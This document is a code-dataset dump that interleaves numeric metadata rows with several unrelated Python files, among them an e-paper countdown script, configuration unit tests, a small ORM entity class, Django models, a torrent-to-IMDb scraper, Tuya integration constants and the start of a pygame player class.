0
0
0
0
1
0
false
0
0.138889
0
0.138889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41402626baceb0ad14ef7bcb1114108515c7b502
2,029
py
Python
waveshare/countdown.py
WebReflection/countdown
7ba452de33bbef4c6132c4af0071fe28f6f3e3bb
[ "0BSD" ]
6
2019-10-07T12:03:45.000Z
2019-10-10T11:41:57.000Z
waveshare/countdown.py
WebReflection/countdown
7ba452de33bbef4c6132c4af0071fe28f6f3e3bb
[ "0BSD" ]
null
null
null
waveshare/countdown.py
WebReflection/countdown
7ba452de33bbef4c6132c4af0071fe28f6f3e3bb
[ "0BSD" ]
null
null
null
#!/usr/bin/env python3

# ISC License
#
# Copyright (c) 2019, Andrea Giammarchi, @WebReflection
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.

import random
import os
import sys

sys.path.insert(1, os.path.realpath('./node_modules/filebus/python'))

# initialize the display
from waveshare_epd import epd2in13
epaper = epd2in13.EPD()

# they defined width and height upside down ^_^;;
width = epaper.height
height = epaper.width

# initialize the "canvas"
from PIL import Image, ImageFont, ImageDraw

# initialize the font
from font_fredoka_one import FredokaOne
font = ImageFont.truetype(FredokaOne, 42)

# initiate the FileBus channel
from filebus import FileBus

def ready(value=None):
    print('ready')
    epaper.init(epaper.lut_full_update)
    epaper.Clear(0xFF)
    epaper.init(epaper.lut_partial_update)
    fb.send('ready', random.random())

def update(message=''):
    print('update: ' + message)
    w, h = font.getsize(message)
    x = (width - w) / 2
    y = (height - h) / 2
    img = Image.new("P", (width, height), 255)
    draw = ImageDraw.Draw(img)
    draw.text((x, y), message, font=font, fill=0)
    epaper.display(epaper.getbuffer(img.rotate(180)))
    fb.send('update', random.random())

# use .js as channel input, and .python as channel output
fb = FileBus('.js', '.python')
fb.on('ready', ready)
fb.on('update', update)

# just wait for JS handshake
30.283582
79
0.73928
300
2,029
4.97
0.51
0.024145
0.021462
0.025486
0
0
0
0
0
0
0
0.014035
0.15722
2,029
66
80
30.742424
0.857895
0.497782
0
0
0
0
0.075301
0.029116
0
0
0.004016
0
0
1
0.064516
false
0
0.225806
0
0.290323
0.064516
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41406dd0b9bde817da5cd6498dd268425faf759a
4,553
py
Python
test/unit/configuration/test_configuration_from_main.py
Sam-Martin/graph-notebook
e7a8cefb93891ea19d6df4f17fe0acca3e223ae9
[ "ISC", "Apache-2.0", "CC0-1.0" ]
378
2020-11-02T23:44:37.000Z
2022-03-31T17:07:16.000Z
test/unit/configuration/test_configuration_from_main.py
Sam-Martin/graph-notebook
e7a8cefb93891ea19d6df4f17fe0acca3e223ae9
[ "ISC", "Apache-2.0", "CC0-1.0" ]
124
2020-11-07T14:35:28.000Z
2022-03-29T21:07:09.000Z
test/unit/configuration/test_configuration_from_main.py
Sam-Martin/graph-notebook
e7a8cefb93891ea19d6df4f17fe0acca3e223ae9
[ "ISC", "Apache-2.0", "CC0-1.0" ]
76
2020-11-04T03:52:08.000Z
2022-03-31T17:17:06.000Z
""" Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 """ import os import unittest from graph_notebook.configuration.generate_config import AuthModeEnum, Configuration from graph_notebook.configuration.get_config import get_config class TestGenerateConfigurationMain(unittest.TestCase): @classmethod def setUpClass(cls) -> None: cls.generic_host = 'blah' cls.neptune_host = 'instance.cluster.us-west-2.neptune.amazonaws.com' cls.port = 8182 cls.test_file_path = f'{os.path.abspath(os.path.curdir)}/test_generate_from_main.json' cls.python_cmd = os.environ.get('PYTHON_CMD', 'python3') # environment variable to let ToD hosts specify # where the python command is that is being used for testing. def tearDown(self) -> None: if os.path.exists(self.test_file_path): os.remove(self.test_file_path) def test_generate_configuration_main_defaults_neptune(self): expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.DEFAULT, load_from_s3_arn='', ssl=True) self.generate_config_from_main_and_test(expected_config, host_type='neptune') def test_generate_configuration_main_defaults_generic(self): expected_config = Configuration(self.generic_host, self.port, ssl=True) self.generate_config_from_main_and_test(expected_config) def test_generate_configuration_main_override_defaults_neptune(self): expected_config = Configuration(self.neptune_host, self.port, auth_mode=AuthModeEnum.IAM, load_from_s3_arn='loader_arn', ssl=False) self.generate_config_from_main_and_test(expected_config, host_type='neptune') def test_generate_configuration_main_override_defaults_generic(self): expected_config = Configuration(self.generic_host, self.port, ssl=False) self.generate_config_from_main_and_test(expected_config) def test_generate_configuration_main_empty_args_neptune(self): expected_config = Configuration(self.neptune_host, self.port) result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{expected_config.host}" --port "{expected_config.port}" --auth_mode "" --ssl "" ' f'--load_from_s3_arn "" --config_destination="{self.test_file_path}" ') self.assertEqual(0, result) config = get_config(self.test_file_path) self.assertEqual(expected_config.to_dict(), config.to_dict()) def test_generate_configuration_main_empty_args_generic(self): expected_config = Configuration(self.generic_host, self.port) result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{expected_config.host}" --port "{expected_config.port}" --ssl "" ' f'--config_destination="{self.test_file_path}" ') self.assertEqual(0, result) config = get_config(self.test_file_path) self.assertEqual(expected_config.to_dict(), config.to_dict()) def generate_config_from_main_and_test(self, source_config: Configuration, host_type=None): # This will run the main method that our install script runs on a Sagemaker notebook. # The return code should be 0, but more importantly, we need to assert that the # Configuration object we get from the resulting file is what we expect. 
if host_type == 'neptune': result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{source_config.host}" --port "{source_config.port}" ' f'--auth_mode "{source_config.auth_mode.value}" --ssl "{source_config.ssl}" ' f'--load_from_s3_arn "{source_config.load_from_s3_arn}" ' f'--config_destination="{self.test_file_path}" ') else: result = os.system(f'{self.python_cmd} -m graph_notebook.configuration.generate_config ' f'--host "{source_config.host}" --port "{source_config.port}" ' f'--ssl "{source_config.ssl}" --config_destination="{self.test_file_path}" ') self.assertEqual(result, 0) config = get_config(self.test_file_path) self.assertEqual(source_config.to_dict(), config.to_dict())
56.9125
118
0.679113
566
4,553
5.157244
0.231449
0.076739
0.04111
0.049332
0.646454
0.632751
0.591984
0.55841
0.541966
0.526208
0
0.004783
0.219416
4,553
79
119
57.632911
0.816545
0.097079
0
0.322034
1
0
0.259819
0.184191
0
0
0
0
0.101695
1
0.152542
false
0
0.067797
0
0.237288
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
414211e54fff763958123b81d2506325421d7750
3,201
py
Python
robotpose/constants.py
OSU-AIMS/RoPE-S3D
0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5
[ "Apache-2.0" ]
1
2021-05-17T17:35:01.000Z
2021-05-17T17:35:01.000Z
robotpose/constants.py
OSU-AIMS/RoPE-S3D
0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5
[ "Apache-2.0" ]
1
2021-07-27T23:49:33.000Z
2021-07-29T19:53:14.000Z
robotpose/constants.py
OSU-AIMS/RoPE-S3D
0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5
[ "Apache-2.0" ]
null
null
null
# Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley

import numpy as np
import logging as log

MAX_LINKS = 7

PATH_JSON_PATH = r'data/paths.json'
JSON_LINK_FILE = r"\\marvin\ROPE\joint_states.json"

##################################### Crops

CROP_RENDER_WEIGHTING = [6, 3, 3, 0, 1, 0]  # Higher numbers indicate more weight on that joint for rendering
CROP_VARYING = 'SLUB'          # Joints to vary for crop calculation
CROP_MAX_PER_JOINT = 50        # Max poses for a single joint
CROP_SEC_ALLOTTED_APPROX = 20  # Approx number of seconds allowed for each crop rendering stage calculation
CROP_PADDING = 10

##################################### Lookups

GPU_MEMORY_ALLOWED_FOR_LOOKUP = 0.1  # Depending on hardware, this may vary. ~10% seems to work, but anything ~25%+ will overallocate for calculations
LOOKUP_NAME_LENGTH = 5
LOOKUP_MAX_DIV_PER_LINK = 200
LOOKUP_JOINTS = 'SLU'    # SL is also usable
LOOKUP_NUM_RENDERED = 6  # 3 or 4 for SL

##################################### Segmentation Models

MODELDATA_FILE_NAME = 'ModelData.json'
NUM_MODELS_TO_KEEP = 3  # If a model has more than this number of stored checkpoints, they will be deleted.
MODEL_NAME_LENGTH = 4

##################################### Wizard Settings

WIZARD_DATASET_PREVIEW = True  # Set to false to reduce lag caused by dataset previewing

##################################### Verifier

VERIFIER_ALPHA = .7            # Weight to place on images in verifier
VERIFIER_SELECTED_GAMMA = -50  # Amount to add to R/G/B channels of a selected image. Usually negative.
VERIFIER_SCALER = 1.5          # Scale factor of thumbnails. Overall scale is this divided by THUMBNAIL_DS_FACTOR
VERIFIER_ROWS = 4              # Rows of images present in Verifier
VERIFIER_COLUMNS = 4           # Columns of images present in Verifier

##################################### Datasets

VIDEO_FPS = 15           # Default video frames per second
THUMBNAIL_DS_FACTOR = 6  # Factor to downscale images by for thumbnails. Larger numbers yield smaller images
DEFAULT_CAMERA_POSE = [0, -1.5, .75, 0, 0, 0]  # Base camera pose to fill new datasets with before alignment

##################################### Rendering

def default_render_color_maker(num: int):
    """Creates unique colors for rendering.

    Parameters
    ----------
    num : int
        Number of colors to generate. Should be larger than the number of
        meshes expected to use. For 6-axis robots, the minimum recommended
        number is 7.

    Returns
    -------
    List[List]
        num pairs of RGB triplets
    """
    if num < 7:
        # log.warn is a deprecated alias; use log.warning
        log.warning('Fewer than 7 rendering colors are being generated. '
                    'This may cause issues if a URDF with a 6+ axis robot is loaded.')

    b = np.linspace(0, 255, num).astype(int)  # Blue values are always unique
    g = [0] * b.size
    r = np.abs(255 - 2 * b)

    colors = []
    for idx in range(num):
        colors.append([b[idx], g[idx], r[idx]])

    return colors

DEFAULT_RENDER_COLORS = default_render_color_maker(7)  # Increase if expecting to use more meshes/end effector
34.793478
148
0.672602
460
3,201
4.552174
0.519565
0.015282
0.017192
0.016237
0.023878
0
0
0
0
0
0
0.025573
0.181506
3,201
92
149
34.793478
0.773664
0.504842
0
0
0
0.026316
0.144338
0.024721
0
0
0
0
0
1
0.026316
false
0
0.052632
0
0.105263
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
41427dc7083acbd1f30a5967de148b9aeabaff30
5,619
py
Python
Pybernate/Entity.py
lmnoel/pybernate
807750f5d3a5c356d6516ddd81edaa2210269807
[ "MIT" ]
null
null
null
Pybernate/Entity.py
lmnoel/pybernate
807750f5d3a5c356d6516ddd81edaa2210269807
[ "MIT" ]
null
null
null
Pybernate/Entity.py
lmnoel/pybernate
807750f5d3a5c356d6516ddd81edaa2210269807
[ "MIT" ]
null
null
null
from Pybernate.Exceptions import LazyInitializationException


class Entity:
    def __init__(self):
        self.deleted = False
        self.dirty = False
        self.initialized = False

    def set_dirty(self, state):
        self.dirty = state

    def get_dirty(self):
        return self.dirty

    def set_deleted(self, state):
        self.deleted = state

    def get_deleted(self):
        return self.deleted

    def set_initialized(self, state):
        self.initialized = state

    def get_initialized(self):
        return self.initialized

    def rollback(self):
        pass


class IdEntity(Entity):
    def __init__(self, **kwargs):
        super().__init__()
        self.id = None
        self.table = self.get_subclass_name().lower()
        self.lazies = set()
        self.transients = set()
        self.elements = {}
        self._mixin(kwargs)
        self.id_column = "id"
        self.column_names = list(kwargs.keys())
        self.one_to_many = {}
        self.many_to_one = {}
        self.override_methods()

    def _mixin(self, data):
        if isinstance(data, dict):
            self.lazies -= data.keys()
            self.elements = {**self.elements, **data}
        elif isinstance(data, IdEntity):
            self.elements[data.table] = data

    def set_table(self, table_name):
        self.table = table_name

    def set_id_column(self, col_name):
        self.id_column = col_name

    def add_lazy(self, fxn):
        self.lazies.add(fxn[4:])

    def add_transient(self, fxn):
        self.transients.add(fxn)

    def addOneToMany(self, other_table, join_column):
        self.one_to_many[other_table[4:]] = join_column

    def addManyToOne(self, other_table, join_column):
        self.many_to_one[other_table[4:]] = join_column

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def init_lazy(self, data):
        self.id = data[self.id_column]
        del data[self.id_column]
        self.elements = data
        self.column_names = data.keys()

    def get_element_methods(self):
        return sorted(list(self.get_subclass_methods() - self.transients))  # deterministic for testing

    def override_methods(self):
        methods = self.get_element_methods()
        for method in methods:
            if method.startswith("get_"):
                method_target = method[4:]
                getattr(self, method)()
                if method_target in self.lazies and method_target in self.elements:
                    self.lazies.remove(method_target)
                if self.id_column == method_target:
                    setattr(self, method, lambda: self.get_id())
                    continue
                if method in self.transients:
                    continue
                setattr(self, method, lambda t=method_target: self.get_element(t))
                if method_target not in self.elements:
                    self.set_element(method_target, None)
            elif method.startswith("set_"):
                method_target = method[4:]
                getattr(self, method)(None)
                if method in self.transients:
                    continue
                setattr(self, method, lambda value, x=method_target: self.set_element(x, value))

    def get_element(self, x):
        if x in self.lazies:
            raise LazyInitializationException(x)
        return self.elements[x]

    def set_element(self, x, value):
        self.elements[x] = value
        self.set_dirty(True)

    def get_insert_query(self):
        names_component = ", ".join(["`" + a + "`" for a in self.column_names])
        elements_component = ", ".join(["%s "] * len(self.column_names))
        return "INSERT INTO {} ({}) VALUES ({})".format(self.table, names_component, elements_component)

    def get_update_query(self):
        updates = ", ".join(["{} = '{}'".format(key, value) for key, value in self.elements.items()])
        return "UPDATE {} SET {} WHERE id = {}".format(self.table, updates, self.id)

    def get_initialize_query(self, attribute):
        return "SELECT {} FROM {} WHERE {} = {}".format(attribute, self.table, self.id_column, self.id)

    def get_delete_query(self):
        return "DELETE FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id)

    def get_select_all_query(self):
        return "SELECT * FROM {} WHERE {} = {}".format(self.table, self.id_column, self.id)

    def get_eager_fields(self):
        return self.elements.keys() - self.lazies - self.transients - self.one_to_many.keys() - self.many_to_one.keys()

    def get_many_to_one_relationships(self):
        return self.many_to_one

    def get_one_to_many_relationships(self):
        return self.one_to_many

    def get_select_lazy_query(self):
        fields = self.get_eager_fields()
        fields.add(self.id_column)
        eager_fields = ", ".join(fields)
        return "SELECT {} FROM {} WHERE {} = {}".format(eager_fields, self.table, self.id_column, self.id)

    def get_raw_elements(self):
        return [self.elements[k] for k in self.column_names]

    def get_subclass_name(self):
        return self.__class__.__name__

    def get_subclass_methods(self):
        return {func for func in dir(self.__class__) if callable(getattr(self.__class__, func))} \
            - {func for func in dir(IdEntity) if callable(getattr(IdEntity, func))}
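The accessor rewiring in override_methods() is easiest to see with a subclass. A minimal, hypothetical sketch (the Song class and its field are invented for illustration):

# Declared get_/set_ methods are replaced at construction time with lambdas
# that route through get_element()/set_element().
class Song(IdEntity):
    def get_title(self):
        pass  # body is irrelevant; override_methods() replaces this accessor

    def set_title(self, value):
        pass

song = Song(title="Blue in Green")
print(song.get_title())         # -> "Blue in Green", served from song.elements
print(song.get_insert_query())  # -> "INSERT INTO song (`title`) VALUES (%s )"
song.set_title("So What")       # routes through set_element() and marks the entity dirty
print(song.get_dirty())         # -> True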
34.685185
119
0.588005
672
5,619
4.6875
0.157738
0.038095
0.038095
0.025397
0.173333
0.142222
0.109206
0.086349
0.086349
0.065397
0
0.001275
0.302189
5,619
162
120
34.685185
0.802091
0.004449
0
0.055118
0
0
0.038083
0
0
0
0
0
0
1
0.275591
false
0.007874
0.007874
0.110236
0.440945
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
4143ccf190301cf56eeae0f7c02717bcd229a66f
213
py
Python
molsysmt/native/old/former_topology/elements/groups/__init__.py
dprada/molsysmt
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
[ "MIT" ]
3
2020-06-02T03:55:52.000Z
2022-03-21T04:43:52.000Z
molsysmt/native/old/former_topology/elements/groups/__init__.py
dprada/molsysmt
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
[ "MIT" ]
28
2020-06-24T00:55:53.000Z
2021-07-16T22:09:19.000Z
molsysmt/native/old/former_topology/elements/groups/__init__.py
dprada/molsysmt
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
[ "MIT" ]
1
2021-06-17T18:55:25.000Z
2021-06-17T18:55:25.000Z
from .group import Group
from .aminoacid import AminoAcid
from .nucleotide import Nucleotide
from .water import Water
from .ion import Ion
from .cosolute import Cosolute
from .small_molecule import SmallMolecule
23.666667
41
0.830986
29
213
6.068966
0.37931
0
0
0
0
0
0
0
0
0
0
0
0.13615
213
8
42
26.625
0.956522
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
5
41444b1ef7879f2253a4932d8f0e3e78f39e2fa9
101
py
Python
DCAL_utils_special/plotter_utils_consts.py
gamedaygeorge/datacube-applications-library
1b6314ee3465f9f17930391a4c241e981a9e200e
[ "Apache-2.0" ]
null
null
null
DCAL_utils_special/plotter_utils_consts.py
gamedaygeorge/datacube-applications-library
1b6314ee3465f9f17930391a4c241e981a9e200e
[ "Apache-2.0" ]
null
null
null
DCAL_utils_special/plotter_utils_consts.py
gamedaygeorge/datacube-applications-library
1b6314ee3465f9f17930391a4c241e981a9e200e
[ "Apache-2.0" ]
1
2021-02-25T14:19:05.000Z
2021-02-25T14:19:05.000Z
# The number of points to use in smooth curve fits.
n_pts_smooth = 2000

default_fourier_n_harm = 10
33.666667
52
0.782178
19
101
3.894737
0.894737
0
0
0
0
0
0
0
0
0
0
0.072289
0.178218
101
3
53
33.666667
0.819277
0.485149
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
4144ac6c76ba124c7f21052971d1bc054211eeab
447
py
Python
reads/migrations/0008_auto_20171119_0744.py
mguarascio/runnerreads-com
3bc877cf24370cf881a98a1c5915693464bc69e8
[ "MIT" ]
null
null
null
reads/migrations/0008_auto_20171119_0744.py
mguarascio/runnerreads-com
3bc877cf24370cf881a98a1c5915693464bc69e8
[ "MIT" ]
null
null
null
reads/migrations/0008_auto_20171119_0744.py
mguarascio/runnerreads-com
3bc877cf24370cf881a98a1c5915693464bc69e8
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-19 12:44
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('reads', '0007_auto_20171115_2224'),
    ]

    operations = [
        migrations.AlterField(
            model_name='book',
            name='link',
            field=models.CharField(max_length=2000),
        ),
    ]
21.285714
52
0.612975
50
447
5.28
0.82
0
0
0
0
0
0
0
0
0
0
0.11315
0.268456
447
20
53
22.35
0.69419
0.152125
0
0
1
0
0.095745
0.06117
0
0
0
0
0
1
0
false
0
0.153846
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4146262f3d74196d4ad2779199fd0a16f247abbd
930
py
Python
full_metal/models.py
nightwarriorftw/alchemist
38634da50370edc07c1bae09ff05a66e92f2f8c0
[ "MIT" ]
null
null
null
full_metal/models.py
nightwarriorftw/alchemist
38634da50370edc07c1bae09ff05a66e92f2f8c0
[ "MIT" ]
null
null
null
full_metal/models.py
nightwarriorftw/alchemist
38634da50370edc07c1bae09ff05a66e92f2f8c0
[ "MIT" ]
null
null
null
from django.db import models


class MarketingCampaign(models.Model):
    """Store the information of marketing campaign."""
    title = models.CharField(max_length=50)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self) -> str:
        return f'<Marketing Campaign: {self.title}>'


class Voucher(models.Model):
    """Store the information of the voucher."""
    campaign = models.ForeignKey(MarketingCampaign, on_delete=models.CASCADE, related_name="campaign")
    code = models.CharField(max_length=15)
    active = models.BooleanField(default=False)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)

    def __str__(self) -> str:
        active = "Yes" if self.active else "No"
        return f"<Voucher: {self.code} ({active})>"
34.444444
102
0.711828
117
930
5.470085
0.42735
0.05
0.13125
0.15625
0.39375
0.39375
0.29375
0.29375
0.29375
0.29375
0
0.005195
0.172043
930
27
103
34.444444
0.825974
0.088172
0
0.352941
0
0
0.095465
0
0
0
0
0
0
1
0.117647
false
0
0.117647
0.058824
0.941176
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
4146c32ffd539838b9529d72258302c84167df28
1,216
py
Python
pantofola_search/tools/kickass_fetcher.py
phingage/pantofola.io
f41036d2e568a45f328e2a7ca81d76a27cd134dc
[ "WTFPL" ]
1
2018-06-09T22:20:00.000Z
2018-06-09T22:20:00.000Z
pantofola_search/tools/kickass_fetcher.py
phingage/pantofola.io
f41036d2e568a45f328e2a7ca81d76a27cd134dc
[ "WTFPL" ]
4
2020-02-11T22:01:16.000Z
2021-06-10T17:38:56.000Z
pantofola_search/tools/kickass_fetcher.py
phingage/pantofola.io
f41036d2e568a45f328e2a7ca81d76a27cd134dc
[ "WTFPL" ]
null
null
null
__author__ = 'armanini'

import httplib
import re

import requests
from urlparse import urlparse


class KickAssFetcher(object):

    def __init__(self):
        self.search_url = "http://kickass.to/usearch/"
        self.title_re = re.compile(r'(?P<imdb_id>tt\d{7})', flags=re.IGNORECASE + re.MULTILINE)

    def search(self, torrent_hash):
        url = self.search_url + torrent_hash
        print "Start search for: ", url
        r = requests.get(url)
        # the original tested len(r.history) < 0, which can never be true;
        # an empty redirect history is what actually signals a failed lookup
        if len(r.history) == 0 or r.history[-1].status_code != 302:
            print "No History ", r.history
            return None
        res = self.title_re.findall(r.text)
        print res
        if res:
            print "Found: ", res[-1]
            return res[-1]
        else:
            print "Imdb Not found!"
            return None

    def get_status_code(self, url):
        url_part = urlparse(url)
        try:
            conn = httplib.HTTPConnection(url_part.netloc)
            conn.request("HEAD", url_part.path)
            return conn.getresponse().status
        except Exception:
            return None


def main():
    kParse = KickAssFetcher()
    kParse.search("252DDC4D3EF6E7EE393CD842239ACEB86BF7A546")


if __name__ == "__main__":
    main()
25.87234
95
0.589638
145
1,216
4.744828
0.482759
0.034884
0.037791
0
0
0
0
0
0
0
0
0.03517
0.29852
1,216
47
96
25.87234
0.771395
0
0
0.085714
0
0
0.129006
0.032868
0
0
0
0
0
0
null
null
0
0.057143
null
null
0.142857
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
4148771c5460032b6e6cf71a733f1a7a81a72d62
2,893
py
Python
custom_components/localtuya/const.py
JonathanFerraz/home-assistant
15cd52f5eff850f978949406071fbe98b882918a
[ "MIT" ]
18
2016-08-10T01:02:27.000Z
2017-10-26T04:19:49.000Z
custom_components/localtuya/const.py
JonathanFerraz/home-assistant
15cd52f5eff850f978949406071fbe98b882918a
[ "MIT" ]
null
null
null
custom_components/localtuya/const.py
JonathanFerraz/home-assistant
15cd52f5eff850f978949406071fbe98b882918a
[ "MIT" ]
4
2017-04-20T19:41:21.000Z
2017-05-16T17:10:05.000Z
"""Constants for localtuya integration.""" ATTR_CURRENT = "current" ATTR_CURRENT_CONSUMPTION = "current_consumption" ATTR_VOLTAGE = "voltage" CONF_LOCAL_KEY = "local_key" CONF_PROTOCOL_VERSION = "protocol_version" CONF_DPS_STRINGS = "dps_strings" CONF_PRODUCT_KEY = "product_key" # light CONF_BRIGHTNESS_LOWER = "brightness_lower" CONF_BRIGHTNESS_UPPER = "brightness_upper" CONF_COLOR = "color" CONF_COLOR_MODE = "color_mode" CONF_COLOR_TEMP_MIN_KELVIN = "color_temp_min_kelvin" CONF_COLOR_TEMP_MAX_KELVIN = "color_temp_max_kelvin" CONF_COLOR_TEMP_REVERSE = "color_temp_reverse" CONF_MUSIC_MODE = "music_mode" # switch CONF_CURRENT = "current" CONF_CURRENT_CONSUMPTION = "current_consumption" CONF_VOLTAGE = "voltage" # cover CONF_COMMANDS_SET = "commands_set" CONF_POSITIONING_MODE = "positioning_mode" CONF_CURRENT_POSITION_DP = "current_position_dp" CONF_SET_POSITION_DP = "set_position_dp" CONF_POSITION_INVERTED = "position_inverted" CONF_SPAN_TIME = "span_time" # fan CONF_FAN_SPEED_CONTROL = "fan_speed_control" CONF_FAN_OSCILLATING_CONTROL = "fan_oscillating_control" CONF_FAN_SPEED_MIN = "fan_speed_min" CONF_FAN_SPEED_MAX = "fan_speed_max" CONF_FAN_ORDERED_LIST = "fan_speed_ordered_list" CONF_FAN_DIRECTION = "fan_direction" CONF_FAN_DIRECTION_FWD = "fan_direction_forward" CONF_FAN_DIRECTION_REV = "fan_direction_reverse" # sensor CONF_SCALING = "scaling" # climate CONF_TARGET_TEMPERATURE_DP = "target_temperature_dp" CONF_CURRENT_TEMPERATURE_DP = "current_temperature_dp" CONF_TEMPERATURE_STEP = "temperature_step" CONF_MAX_TEMP_DP = "max_temperature_dp" CONF_MIN_TEMP_DP = "min_temperature_dp" CONF_PRECISION = "precision" CONF_TARGET_PRECISION = "target_precision" CONF_HVAC_MODE_DP = "hvac_mode_dp" CONF_HVAC_MODE_SET = "hvac_mode_set" CONF_PRESET_DP = "preset_dp" CONF_PRESET_SET = "preset_set" CONF_HEURISTIC_ACTION = "heuristic_action" CONF_HVAC_ACTION_DP = "hvac_action_dp" CONF_HVAC_ACTION_SET = "hvac_action_set" CONF_ECO_DP = "eco_dp" CONF_ECO_VALUE = "eco_value" # vacuum CONF_POWERGO_DP = "powergo_dp" CONF_IDLE_STATUS_VALUE = "idle_status_value" CONF_RETURNING_STATUS_VALUE = "returning_status_value" CONF_DOCKED_STATUS_VALUE = "docked_status_value" CONF_BATTERY_DP = "battery_dp" CONF_MODE_DP = "mode_dp" CONF_MODES = "modes" CONF_FAN_SPEED_DP = "fan_speed_dp" CONF_FAN_SPEEDS = "fan_speeds" CONF_CLEAN_TIME_DP = "clean_time_dp" CONF_CLEAN_AREA_DP = "clean_area_dp" CONF_CLEAN_RECORD_DP = "clean_record_dp" CONF_LOCATE_DP = "locate_dp" CONF_FAULT_DP = "fault_dp" CONF_PAUSED_STATE = "paused_state" CONF_RETURN_MODE = "return_mode" CONF_STOP_STATUS = "stop_status" DATA_DISCOVERY = "discovery" DOMAIN = "localtuya" # Platforms in this list must support config flows PLATFORMS = [ "binary_sensor", "climate", "cover", "fan", "light", "number", "select", "sensor", "switch", "vacuum", ] TUYA_DEVICE = "tuya_device"
27.817308
56
0.807812
413
2,893
5.065375
0.227603
0.054493
0.022945
0.034417
0
0
0
0
0
0
0
0
0.104044
2,893
103
57
28.087379
0.807099
0.045282
0
0
0
0
0.359403
0.070571
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
414999092001be652ff829a08dad85777592db23
8,098
py
Python
source/player.py
2nPlusOne/pygame-platformer
69078819280506d8ab1af4c493da22eb02b4fe01
[ "MIT" ]
null
null
null
source/player.py
2nPlusOne/pygame-platformer
69078819280506d8ab1af4c493da22eb02b4fe01
[ "MIT" ]
null
null
null
source/player.py
2nPlusOne/pygame-platformer
69078819280506d8ab1af4c493da22eb02b4fe01
[ "MIT" ]
null
null
null
import pygame

from settings import *
import utils


class Player(pygame.sprite.Sprite):
    def __init__(self, pos, groups, collision_sprites):
        super().__init__(groups)
        self.image = pygame.Surface((TILE_SIZE / 2, TILE_SIZE))
        self.image.fill(PLAYER_COLOR)
        self.rect = self.image.get_rect(topleft=pos)
        self.collision_sprites = collision_sprites

        # Player movement
        self.direction_x = 0  # -1 = left, 1 = right, 0 = none
        self.velocity = pygame.math.Vector2()
        self.speed = MAX_PLAYER_SPEED

        # Jumping
        self.jumps_remaining = MAX_JUMPS
        self.is_grounded = False     # Is the player on the ground?
        self.was_grounded = False    # Used to determine if the player has left the ground this frame
        self.is_jumping = False      # Is the player jumping?
        self.jump_pressed = False    # Is the jump key currently pressed?
